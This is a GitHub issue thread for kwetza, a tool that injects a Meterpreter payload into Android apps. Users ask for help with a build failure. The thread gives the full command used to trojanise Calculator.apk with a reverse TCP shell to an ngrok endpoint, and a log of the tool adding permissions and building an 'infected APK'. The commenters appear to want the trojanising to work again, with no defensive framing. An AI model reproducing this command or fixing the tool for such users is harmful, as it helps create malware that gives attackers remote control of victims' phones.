sensepost / kwetza

Python script to inject existing Android applications with a Meterpreter payload.
GNU General Public License v2.0
637 stars 237 forks source link

!!! ERROR IN 'buildAgain' method #45

Open lolybob opened 4 years ago

lolybob commented 4 years ago

[*] DECOMPILING TARGET APK Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true [+] ENDPOINT IP: 0.tcp.ngrok.io [+] ENDPOINT PORT: **** Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true [+] APKTOOL DECOMPILED SUCCESS [] BYTING TCP COMMS [] ANALYZING ANDROID MANIFEST [] USING CUSTOM ACTIVITY: AssistActivity [] PREPARING PAYLOADS [] INJECTING INTO APK [+] CHECKING IF ADDITIONAL PERMS TO BE ADDED [] INJECTION OF CRAZY PERMISSIONS TO BE DONE! [+] TIME TO BUILD INFECTED APK... [] EXECUTING APKTOOL BUILD COMMAND... Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true [+] BUILD RESULT ##################################### I: Using Apktool 2.4.1 I: Checking whether sources has changed... I: Smaling smali folder into classes.dex... I: Checking whether resources has changed... I: Copying raw resources... I: Copying libs... (/META-INF/services) I: Building apk file... I: Copying unknown files/dir... I: Built apk...

#####################################
[*] EXECUTING JARSIGNER COMMAND...
!!! ERROR IN 'buildAgain' method
[Errno 2] No such file or directory
pit@debian:~/Documentos/kwetza$

the program has worked one time but in not working more how to fix it ?

lolybob commented 4 years ago

comand used: python kwetza.py Calculator.apk tcp 0.tcp.ngrok.io 16775 yes AssistActivity

kalithero commented 4 years ago

same issue. please help

Gregbeef commented 4 years ago

This is still broken in the tool. Just checked.